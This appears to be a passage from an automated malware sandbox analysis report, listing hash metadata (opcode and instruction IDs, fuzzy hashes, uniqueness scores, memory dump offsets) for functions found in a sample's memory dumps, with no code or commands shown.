                          • Instruction ID: 17a215126d4657d97e46efd0612ed2b2eff12de6feaaf3822b4a2fb088a41e88
                          • Opcode Fuzzy Hash: e07e13953d8dc551bb6d59bfe42a94b871b0bcb3609006fcb579b6fc08052ce8
                          • Instruction Fuzzy Hash: F0518CB0E002589FDF15CFA8D8857DDBBF2BF88704F158429E815AB340DB799945CB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5be1d5453d6f155f66d2f0b230d62e9effcf8b991d26800cd2fc2e353f04e1c9
                          • Instruction ID: a89981c1dce55aedd6764a1191df1e676ed2dec936fadc1b1c3920eb1163c412
                          • Opcode Fuzzy Hash: 5be1d5453d6f155f66d2f0b230d62e9effcf8b991d26800cd2fc2e353f04e1c9
                          • Instruction Fuzzy Hash: 0A51AE30A00214CFDB15EBB8D818BAEBBF5EF89314F154869C406EB361DB39AD40CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c7aba5b878a98336b52ae775c6c381f328f2b162ed8ccd746ef230b67e29fe82
                          • Instruction ID: 8a1bc69d705558844b40a004dc8b739cc1b706233b9dd9cd61643ccd25ddf7fe
                          • Opcode Fuzzy Hash: c7aba5b878a98336b52ae775c6c381f328f2b162ed8ccd746ef230b67e29fe82
                          • Instruction Fuzzy Hash: A1411531F042759FCB126BB9AC081AFBBF5EFC6310F160976D946EB261EA708D418791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ddb5118bf90845e9b432068fbbc4af90e5524ea3272731bcd0f79406f50a0acc
                          • Instruction ID: 74a8539531e9878026d35f3a55d10322963c2b484cb40ce9f86e0f3eaf27cf43
                          • Opcode Fuzzy Hash: ddb5118bf90845e9b432068fbbc4af90e5524ea3272731bcd0f79406f50a0acc
                          • Instruction Fuzzy Hash: 52418E30605314CFDB56EBB4D919AAD7BF1AF8A304F2204A9D442DB2B2DF358C45CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1203e43fdbfaa73a994250a9076f597ce860f96ec97099fee51a1c53208c3fbb
                          • Instruction ID: c93d857a882bb189dab881da71e8654ec143930f774804162c6da88129125dc4
                          • Opcode Fuzzy Hash: 1203e43fdbfaa73a994250a9076f597ce860f96ec97099fee51a1c53208c3fbb
                          • Instruction Fuzzy Hash: A5318F307042548FCB16EB74D918A9D7BF1AF4A304F1244A9D446EB3A2DF39AD05CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1a1c8734e8741a905981ae80bb5b677470903b302929dfff3b47271a53277850
                          • Instruction ID: 771a596ebf86124c7fcc0dbcd1ba3b05e44b06178826cff21d721f8e253b49aa
                          • Opcode Fuzzy Hash: 1a1c8734e8741a905981ae80bb5b677470903b302929dfff3b47271a53277850
                          • Instruction Fuzzy Hash: 23316F30B002089BDB54ABB0AC5DBAF7AE7ABC8714F154838E502EB7D0DF749C4597A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec609b43ef04cd4b49a51c356165ac6047d3f793ee3026d386a8ddfa8c0e0db1
                          • Instruction ID: 6f241f74be86ea735aead600f33e8efb6ed6819808bbc8007088012e2ca274ba
                          • Opcode Fuzzy Hash: ec609b43ef04cd4b49a51c356165ac6047d3f793ee3026d386a8ddfa8c0e0db1
                          • Instruction Fuzzy Hash: 0C2195387005349BDF329959F6C073AF3A5EBB9320F258D2AE85EC7750C625EC818B81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: afa9fb44d2aaf3bca24ac7f645d3e9d2f34fb6ba21e27f00eec773db1d57f5a7
                          • Instruction ID: 5950fc58c7a2d5c7f279d5f76c19b69132d704481634b9d537c3e9cb23df1fa2
                          • Opcode Fuzzy Hash: afa9fb44d2aaf3bca24ac7f645d3e9d2f34fb6ba21e27f00eec773db1d57f5a7
                          • Instruction Fuzzy Hash: CA314934A00214CFDB56EBB4D919AAD76F2AF8A309F210468D842E73A1DF358D41CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363460452.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 12d7df9eb20f3917b6f75457d65059689edbc3449b1b1847cf9babbe6b99b210
                          • Instruction ID: f1ecab86a371311f18934c1df90e47eaef7c43313921738317efe35aa3b4ba16
                          • Opcode Fuzzy Hash: 12d7df9eb20f3917b6f75457d65059689edbc3449b1b1847cf9babbe6b99b210
                          • Instruction Fuzzy Hash: 27210671500608DFDB15DF50D8C0B2ABFA7FB94718F24C56AE9050B606C336E846E7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363460452.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0cbeec22eb31de3054254c8800deabc9506f62ca103ef8fdbcb2b2dba9d8e0ca
                          • Instruction ID: 5b5efead9c65b0034bcaf0024c39e9dcc5632f9e48aba0d689e1d329f352a131
                          • Opcode Fuzzy Hash: 0cbeec22eb31de3054254c8800deabc9506f62ca103ef8fdbcb2b2dba9d8e0ca
                          • Instruction Fuzzy Hash: FD216771100208DFDF14CF50D8C0B2ABFA6FB98718F34C56AEA094B606C336D846E7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: faae06519f4521f5a6be7de7c6bf6f4edbf2cb06a8e10cf4c99c78cad177967f
                          • Instruction ID: 37d45b6f2e58bdc1306acd7b3733515f3ed2ef17c7341fdb66b2121bc807efab
                          • Opcode Fuzzy Hash: faae06519f4521f5a6be7de7c6bf6f4edbf2cb06a8e10cf4c99c78cad177967f
                          • Instruction Fuzzy Hash: 5A213E30700214CFCB15FBB8D918AAD77F2AF89305B1105A9D406EB3A1DF35AE11CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363481258.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0bf02b15ef346768920827f2a05211ff9fa088ac0373bda3d8358f14187561ea
                          • Instruction ID: 46deaa19d83a7c91d4b3524d3a3a1dd4f0d5f8d34113c72735021610be399c96
                          • Opcode Fuzzy Hash: 0bf02b15ef346768920827f2a05211ff9fa088ac0373bda3d8358f14187561ea
                          • Instruction Fuzzy Hash: 2721F275604204EFDB14DFA4E884B16BB65EB84314F34C969E88D4B28AC3B7D847CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d90fc54b7fc5046cd78afe788b929ee33df79d864f34c7dace3ce24bcb23386a
                          • Instruction ID: f9af964e36d99767c5926eab42a4596721834e4050b95fa6c11048b49cf95c89
                          • Opcode Fuzzy Hash: d90fc54b7fc5046cd78afe788b929ee33df79d864f34c7dace3ce24bcb23386a
                          • Instruction Fuzzy Hash: 70118639A042B08BDF33493DF6C0736B7A5EB7A320F2A4D6BD859CB651D154DC818792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363460452.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61fe1e779726df5992be31074ed1ae92b2c3a483df3d2989a5ebcce4fe8c13d2
                          • Instruction ID: 9fbb5dcba23e60c36931fd1b76d033e8fe963d4de1a27072bd930451e238acbf
                          • Opcode Fuzzy Hash: 61fe1e779726df5992be31074ed1ae92b2c3a483df3d2989a5ebcce4fe8c13d2
                          • Instruction Fuzzy Hash: 5711E676404644DFCF06CF10D5C4B26BFB2FB94714F24C6AAD9490B616C336D85ADBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363460452.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61fe1e779726df5992be31074ed1ae92b2c3a483df3d2989a5ebcce4fe8c13d2
                          • Instruction ID: f5f4711167d2e058b6aa94050356921a4b9a0144c8743a866b0b9b4a5a221ac5
                          • Opcode Fuzzy Hash: 61fe1e779726df5992be31074ed1ae92b2c3a483df3d2989a5ebcce4fe8c13d2
                          • Instruction Fuzzy Hash: D111E676404284DFCF16CF10D5C4B26BFB2FB95314F28C5AAD9094B616C336D85ADBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363481258.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 29ddb8f9d0130eb6a37d59f95b18bcdd700c692ab4810ce683e3c0c6563d6904
                          • Instruction ID: e197641f7d98fb078e605319c574265f1c59993114680920e0e2ee81d3c009a6
                          • Opcode Fuzzy Hash: 29ddb8f9d0130eb6a37d59f95b18bcdd700c692ab4810ce683e3c0c6563d6904
                          • Instruction Fuzzy Hash: E611BB75504280DFCB11CF50E584B15BBA1FB84314F24C6AAE8894B69AC37AD80ACBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e438b6ff45945356681bc9f3097fb985bc6ceb2b692e475d6dd1e499e784e39b
                          • Instruction ID: 9aed798e21f1f7236c51d65e2e1503351fc495ece6c7e98bd3c5ea415949fa48
                          • Opcode Fuzzy Hash: e438b6ff45945356681bc9f3097fb985bc6ceb2b692e475d6dd1e499e784e39b
                          • Instruction Fuzzy Hash: B2F0E5313980145BC20066ACE424ABE72DFCFC7354B10493AF206DF792DFA0AC0283A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08f3e9aadd6136851c0b82cf189ac8586d283a23c51f7d9e7990bce264d8ec5b
                          • Instruction ID: 5adce0de6edc1d8ea614b5f8c2a3cce930cc0dd246a22e95428c32d272b63daf
                          • Opcode Fuzzy Hash: 08f3e9aadd6136851c0b82cf189ac8586d283a23c51f7d9e7990bce264d8ec5b
                          • Instruction Fuzzy Hash: 38E0D8317083418FE706D7399929B153BE99B85300F0AC4F7D144CB266EF74EC858B40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b500f9ee127f10066b0bbacf9ef372cba37eef212888e352a868f238983d33c7
                          • Instruction ID: ee98d65a46ebc64caeccc55037d83aae5880c2ce3a841efdf29124e4014c408f
                          • Opcode Fuzzy Hash: b500f9ee127f10066b0bbacf9ef372cba37eef212888e352a868f238983d33c7
                          • Instruction Fuzzy Hash: 11E0CD35B043418FD715C7359468B553BD15790300F05C179D445C7265EB74C8858A00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2363591749.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: ,GNj$JNj
                          • API String ID: 0-3554904898
                          • Opcode ID: d4ddc50f28a54fc430da297caa31877f7795953bd23e15b5b150f47587a92711
                          • Instruction ID: 02a524c7edc5170a21ae94cde4d851adf243283c181ba718cbbc54e590fab835
                          • Opcode Fuzzy Hash: d4ddc50f28a54fc430da297caa31877f7795953bd23e15b5b150f47587a92711
                          • Instruction Fuzzy Hash: 64B17C70E00629CFDB11CFA8D8857EDBBF2BF88314F258529D815E7254EB749981CB91
                          Uniqueness

                          Uniqueness Score: -1.00%